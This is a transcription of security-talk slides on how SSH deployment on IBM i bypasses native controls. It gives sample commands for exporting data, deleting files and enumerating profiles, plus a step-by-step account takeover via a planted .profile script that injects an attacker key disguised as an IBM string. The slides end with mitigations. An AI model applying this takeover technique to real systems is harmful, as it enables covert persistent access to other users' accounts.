User Home Directory. Hackingiseries.com

Similar documents
WinSCP PuTTY as an alternative to F-Secure July 11, 2006

Redpaper. Securing Communications with OpenSSH on IBM i5/os. Front cover. ibm.com/redbooks. Learn how to install, configure, and use SSH with i5/os

Nessus Training Session 2 - Scanning and Reporting

HIPAA Compliance Use Case

CASHNet Secure File Transfer Instructions

TIBCO MFT Platform Server for IBM i User Guide. Software Release April 2013

AnzioWin FTP Dialog. AnzioWin version 15.0 and later

Secure File Transfer Installation. Sender Recipient Attached FIles Pages Date. Development Internal/External None 11 6/23/08

Introduction to the new mainframe Chapter 4: Interactive facilities of z/os: TSO/E, ISPF, and UNIX

REPRINT. Release Reference Manual. IBM iseries (AS/400) Developed and Distributed by

Tera Term Telnet. Introduction

GoAnywhere Director to GoAnywhere MFT Upgrade Guide. Version: Publication Date: 07/09/2015

Security Service tools user IDs and passwords

2 Advanced Session... Properties 3 Session profile... wizard. 5 Application... preferences. 3 ASCII / Binary... Transfer

TELNET CLIENT 5.11 SSH SUPPORT

Upgrade Guide. Product Version: Publication Date: 02/11/2015

Secure Shell Demon setup under Windows XP / Windows Server 2003

If you prefer to use your own SSH client, configure NG Admin with the path to the executable:

SSL Tunnels. Introduction

Using sftp in Informatica PowerCenter

System i Access for Web Configuring an Integrated Web Application Server Instance

Configuring CSS Remote Access Methods

IBM DB2 Content Manager. OnDemand for iseries / Kofax Ascent Capture. Release Script Guide SC

Secure Shell. The Protocol

Overview. Remote access and file transfer. SSH clients by platform. Logging in remotely

File Transfer Examples. Running commands on other computers and transferring files between computers

How to upload large files to a JTAC Case

Installation and Administration Guide

What IT Auditors Need to Know About Secure Shell. SSH Communications Security

GoAnywhere MFT Upgrade Guide. Version: Publication Date: 08/12/2015

HPCC - Hrothgar Getting Started User Guide

Linux FTP Server Setup

AS/400 for pentesters

Install and configure SSH server

CREATE!FORM SERVER FOR ISERIES V6R1 INSTALLATION

REPRINT. Release User s Guide. iseries (AS/400) Developed and Distributed by

4PSA Total Backup User's Guide. for Plesk and newer versions

Management, Logging and Troubleshooting

Connectivity using ssh, rsync & vsftpd

Scheduling in SAS 9.3

for Networks Installation Guide for the application on the server July 2014 (GUIDE 2) Lucid Rapid Version 6.05-N and later

Guide to the Configuration and Use of SFTP Clients for Uploading Digital Treatment Planning Data to IROC RI

TS-800. Configuring SSH Client Software in UNIX and Windows Environments for Use with the SFTP Access Method in SAS 9.2, SAS 9.3, and SAS 9.

Configuring SSH and Telnet

SSH Secure Client (Telnet & SFTP) Installing & Using SSH Secure Shell for Windows Operation Systems

PT Activity: Configure Cisco Routers for Syslog, NTP, and SSH Operations

MKS Toolkit. Connectivity Solutions Guide. MKS Inc.

How to Push CDR Files from Asterisk to SDReporter. September 27, 2013

RemotelyAnywhere. Security Considerations

ASX SFTP External User Guide

Ciphermail Gateway Separate Front-end and Back-end Configuration Guide

Centers for Medicare and Medicaid Services. Connect: Enterprise Secure Client (SFTP) Gentran. Internet Option Manual

Lab Configure Basic AP Security through IOS CLI

Using WinSCP to Transfer Data with Florida SHOTS

Secure File Transfer Protocol User Guide

FirewallTM. isecurity. Out-of-the Box. The Network Security Component of. Version 15. Copyright Raz-Lee Security Ltd.

Managing Users and Identity Stores

User's Guide. Product Version: Publication Date: 7/25/2011

Access Instructions for United Stationers ECDB (ecommerce Database) 2.0

MATLAB on EC2 Instructions Guide

How to Tunnel Remote Desktop using SSH (Cygwin) for Windows XP (SP2)

Introduction to HP NonStop SSH Customer Talk 01/24/08

You re probably already familiar with using a File Transfer Protocol (FTP)

How Do I Recover infiniti Remotes and Line Cards?

Automated Offsite Backup with rdiff-backup

After you have created your text file, see Adding a Log Source.

Installation and Administration Guide

IBM i Version 7.2. Security Service Tools

SSH with private/public key authentication

XFTP 5 User Guide. The Powerful SFTP/FTP File Transfer Program. NetSarang Computer Inc.

SAS 9.4 In-Database Products

Learning Series: SAP NetWeaver Process Orchestration, secure connectivity add-on 1c SFTP Adapter

Secure Proxy Server Installation Guide

Adobe Marketing Cloud Using FTP and sftp with the Adobe Marketing Cloud


for Networks Installation Guide for the application on the server August 2014 (GUIDE 2) Lucid Exact Version 1.7-N and later

Using the Content Distribution Manager GUI

Linux Development Environment Description Based on VirtualBox Structure

Detailed Analysis Achieving PCI Compliance with SkyView Partners Products for AIX

Exercises: FreeBSD: Apache and SSL: pre SANOG VI Workshop

How to deploy console cable to connect WIAS-3200N and PC, to reset setting or check status via console

WS_FTP Pro for Windows 95/98/NT

for Networks Installation Guide for the application on a server September 2015 (GUIDE 2) Memory Booster version 1.3-N and later

? Index. Introduction. 1 of 38 About the QMS Network Print Monitor for Windows NT

Linux Overview. Local facilities. Linux commands. The vi (gvim) editor

TELE 301 Network Management. Lecture 16: Remote Terminal Services

SSH and Basic Commands

IBM eserver iseries ITSO Technical Forum 2005

ERserver. iseries. Networking TCP/IP Setup

Installation Guide for WebSphere Application Server (WAS) and its Fix Packs on AIX V5.3L

Scheduling in SAS 9.4 Second Edition

HelpSystems Web Server User Guide

SSL VPN. Virtual Appliance Installation Guide. Virtual Private Networks

Issue 1. Nokia and Nokia Connecting People are registered trademarks of Nokia Corporation

Web Application Report

[HOW TO RECOVER AN INFINITI/EVOLUTION MODEM IDX ] 1

Transcription:

User Home Directory Hackingiseries.com

Insecure Shells: The problem with SSH

Shalom Carmel is the CTO of GlobalDots.com, a security expert and the author of the Hacking iseries book. He can be contacted at shalom@hackingiseries.com Hackingiseries.com

You are going to see how SSH deployment on IBM i may cause unexpected, major security risks Hackingiseries.com

SSH functionality sftp, scp Secure file transfer ssh - Secure shell (like Telnet) Available on IBM i since 5.3

SSH is good SSH is encrypted FTP and TELNET are not Easy to script file transfers SSH can be used to encrypt other cleartext protocols via tunneling De-facto standard in Unix/Linux

However SSH deployment on IBM i may cause unexpected major security risks

IBM i security methodology Application Security System configuration Limit user Special authorities Limit user capabilities Exit program security System Object security Too often not implemented well.

No application security Use the db2 utility to access or modify data $ $ qsh -c 'db2 "select * from NWDB.products"' > products.txt $

Some system configuration is irrelevant Session Timeout Limit QSECOFR access 5250 policies irrelevant to SSH Limit virtual devices Password policies Password policies irrelevant to SSH if using private keys

A user has limited capabilities in the user profile

and cannot run some commands

No limit to user capabilities in SSH Use the system utility to run the command that was previously blocked Using username "shalom". shalom@myas400's password: $ $ system dltf NWDB/items CPC2191: Object ITEMS in NWDB type *FILE deleted.

SSH disregards 5250 parms Ignores user level initial program Ignores user level initial menu

No exit program security Use external sftp tools to get the data out, either from IFS or from a library psftp> open MyAS400 login as: shalom shalom@myas400's password: Remote working directory is /home/shalom psftp> psftp> get products.txt remote:/home/shalom/products.txt => local:products.txt psftp> psftp> get /qsys.lib/nwdb.lib/prices.file/prices.mbr remote: /qsys.lib/nwdb.lib/prices.file/prices.mbr => local:prices.mbr

and while we re at it Let s gather some intelligence for the next phase psftp> cd /qsys.lib Remote directory is now /qsys.lib psftp> ls *.USRPRF Listing directory /qsys.lib?rwx------ 1 qsecofr 0 217088 Mar 13 2011 KOKO.USRPRF?rwx------ 1 qsecofr 0 548864 Mar 13 2011 MARYLIN.USRPRF?rwx---r-x 1 vndprof 0 389120 Oct 17 14:23 MENNY.USRPRF?rwx------ 1 qsys 0 8466432 Oct 17 16:08 QDBSHR.USRPRF?rwx------ 1 qsys 0 2699264 Oct 17 14:56 QDBSHRDO.USRPRF?rwx------ 1 qsys 0 110592 Mar 13 2011 QTMPLPD.USRPRF?rwx------ 1 qsecofr 0 1150976 Mar 13 2011 RON.USRPRF?rwx------ 1 qsecofr 0 221184 Mar 13 2011 ROSY.USRPRF?rwx------ 1 qsecofr 0 241664 Oct 17 15:45 SHALOM.USRPRF?rwx------ 1 qsecofr 0 258048 Mar 13 2011 TAMMI.USRPRF?rwx------ 1 qsecofr 0 2719744 Mar 13 2011 TOBIAS.USRPRF psftp>

User profiles psftp> cd /qsys.lib Remote directory is now /qsys.lib psftp> ls *.USRPRF Listing directory /qsys.lib?rwx------ 1 qsecofr 0 217088 Mar 13 2011 KOKO.USRPRF?rwx------ 1 qsecofr 0 548864 Mar 13 2011 MARYLIN.USRPRF?rwx---r-x 1 vndprof 0 389120 Oct 17 14:23 MENNY.USRPRF?rwx------ 1 qsys 0 8466432 Oct 17 16:08 QDBSHR.USRPRF?rwx------ 1 qsys 0 2699264 Oct 17 14:56 QDBSHRDO.USRPRF?rwx------ 1 qsys 0 110592 Mar 13 2011 QTMPLPD.USRPRF?rwx------ 1 qsecofr 0 1150976 Mar 13 2011 RON.USRPRF?rwx------ 1 qsecofr 0 221184 Mar 13 2011 ROSY.USRPRF?rwx------ 1 qsecofr 0 241664 Oct 17 15:45 SHALOM.USRPRF?rwx------ 1 qsecofr 0 258048 Mar 13 2011 TAMMI.USRPRF?rwx------ 1 qsecofr 0 2719744 Mar 13 2011 TOBIAS.USRPRF psftp>

List of libraries Possible targets to explore psftp> cd /qsys.lib Remote directory is now /qsys.lib psftp> ls *.LIB Listing directory /qsys.lib... drwx------ 1 qdftown 0 2719744 Mar 13 2011 AAETEST2.LIB drwx---rwx 1 qdftown 0 7110592 Mar 13 2011 ABCDATAD.LIB drwx---rwx 1 vndprof 0 675217088 Mar 13 2011 ABCDATAP.LIB drwx---rwx 1 vndprof 0 92699264 Dec 17 14:56 ABCDATAQA.LIB drwx---rwx 1 vndprof 0 3466432 Dec 17 16:08 ABCPGMD.LIB drwx---rwx 1 vndprof 0 4548864 Mar 13 2011 ABCPGMP.LIB drwx---rwx 1 vndprof 0 4389120 Dec 17 14:23 ABCPGMQA.LIB drwx------ 1 quser 0 258048 Mar 13 2011 ADTSLAB.LIB drwx---rwx 1 benny 0 221184 Mar 13 2011 APBENNY.LIB drwx------ 1 quser 0 241664 Oct 17 15:45 APSHPY.LIB drwx------ 1 qdftown 0 1150976 Mar 13 2011 AU117FR.LIB... psftp>

So far we have seen that SSH Ignores key system values Disregards user limited capabilities Bypasses application security Is not controlled by exit program security

IBM i security with SSH System configuration Limit user Special authorities Limit user capabilities Application Security Exit program security System Object security

IBM i security with SSH System configuration Limit user Special authorities Limit user capabilities Application Security Exit program security System Object security You are still at risk, because.

You are going to see How to take over another user s account via SSH

First some explanations about shells and keys Hackingiseries.com

A shell is a piece of software that provides an interface for users of an operating system which provides access to the services of a kernel. Wikipedia

On IBM i this is a shell The regular AS400 5250 menu system and command line USER Select one of the following: User Tasks System: MYAS400 1. Display or change your job 2. Display messages 3. Send a message 4. Submit a job 5. Work with your spooled output files 6. Work with your batch jobs 7. Display or change your library list 8. Change your password 9. Change your user profile 60. More user task options 90. Sign off Selection or command ===> F3=Exit F4=Prompt F9=Retrieve F12=Cancel F13=Information Assistant F16=System Main menu (C) COPYRIGHT IBM CORP. 1980, 2007.

But so is this The QSH command QSH Command Entry Hello SHALOM $ ===> F3=Exit F6=Print F9=Retrieve F12=Disconnect F13=Clear F17=Top F18=Bottom F21=CL command entry

And this PASE AIX emulation: CALL QP2TERM /QOpenSys/usr/bin/-sh Hello SHALOM # ===> F3=Exit F6=Print F9=Retrieve F11=Truncate/Wrap F13=Clear F17=Top F18=Bottom F21=CL command entry

And also SSH SSH runs in the PASE environment, and behaves like PASE except for different keyboard control

Shell mix up The AS400 command line is the primary shell We re good at limiting it, managing access and setting up defaults Very little thought given to proper setup of the other shells

SSH private key authentication Enabled by default in the sshd configuration User creates a private/public key pair Public key placed on the server Private key can be protected by a keyphrase, creating a strong, two factor authentication Enterprise SSH key management is difficult

Lets get down to business Hackingiseries.com

Take over another user via SSH Possible due to the shell mix up on IBM i I am going to associate my own public key with another user The method shown is one of several possible Use your imagination to find other methods After takeover, I can login via SSH as another user, and do stuff as that user Changing the password does not help at all

Step 1: Find a user Must have access to the user s home directory Simple because that is the system default Either a user with *ALLOBJ authority Or a user who owns their home directory A user who uses Qshell or PASE but there are workarounds.

*ALLOBJ considerations If the perpetrator has *ALLOBJ authority, there are still good reasons for him to be able to masquerade as someone else A perpetrator with *ALLOBJ can setup another user without the elaborate preparations detailed in this presentation

Using ssh to find a user In a previous slide you saw how to list QSYS Let s look for a user who has a home dir Using username "badguy". Authenticating with public key "openssh-key" $ cd /home $ ls -l total 136 drwxrws--- 2 badguy 0 8192 Jan 11 09:25 BADGUY drwxrwsrwx 2 goodguy 0 8192 Jan 12 01:45 GOODGUY drwxrwsrwx 3 qibmhelp 0 8192 Apr 28 2008 QIBMHELP drwxrwsrwx 3 qsecofr 0 8192 Jan 11 10:39 QPGMR drwxrwsrwx 2 qsecofr 0 12288 Jan 12 01:57 QSECOFR drwx--s--- 2 user0011 0 8192 Jan 9 09:39 USER0011 drwx--s--- 3 user0022 0 8192 Jan 9 09:31 USER0022 $

Step 2: Create the homedir The attacked user must already own an existing home directory or have *ALLOBJ authority If the attacked user has *ALLOBJ authority but no home directory, then the following command will create the home directory for the next steps MKDIR DIR('/home/GOODGUY') DTAAUT(*EXCLUDE) OBJAUT(*NONE)

Step 3: Modify the shell startup In the home directory, create a file called.profile (with a dot) that does the following: Creates a directory called.ssh Places my public key in file.ssh/authorized_keys Removes all public authority from the home directory, the.ssh directory and authorized_keys Sets ownership of the home directory to self

Step 3: Sample.profile script On the echo command below, the red string should be replaced with your public key. The QIBM 5799SS4 SSHD V3.51 string is just for show if [! -d.ssh ] then mkdir.ssh fi chmod 700.ssh if [! -f.ssh/authorized_keys ] then touch.ssh/authorized_keys setccsid 1252.ssh/authorized_keys fi echo ssh-rsa AAAAB3Nza...7/rNy8= QIBM 5799SS4 SSHD V3.51 \ >>.ssh/authorized_keys chmod 700.ssh/authorized_keys chmod 700. rm.profile

Step 4: Wait As previously stated, this only works with users who run interactive, non-5250 shell sessions. Typically, these are the power IT users If you have *ALLOBJ authority, you can set up all the necessary files and permissions yourself Or find another creative way to force a user to run some code. Read my book for ideas!

Private key authentication highlights Does not care for expired passwords Can log in even if password is *NONE Respects the *DISABLED user status Uses special authorities and object permissions The authorized_keys file can contain multiple public keys

Mitigation: Prevention Manage a white list of allowed users and IP addresses in the sshd configuration file Improve the native object security Jail (chroot) your ssh users (good luck with it ) Create a secure home directory for all relevant users Get a good security package with integrated ssh support

Mitigation: Audit Have a syslog daemon running and log ssh authentication Audit the /QopenSys/etc/profile and the /etc/profile files Audit the authorized_keys files Get a good security package with auditing and syslog support

References Jailing your AS400 users http://bit.ly/a2jg1r SSH in the Midrange wiki http://bit.ly/kdhut

2026 © DocPlayer.net Privacy Policy | Terms of Service | Feedback  | Do Not Sell My Personal Information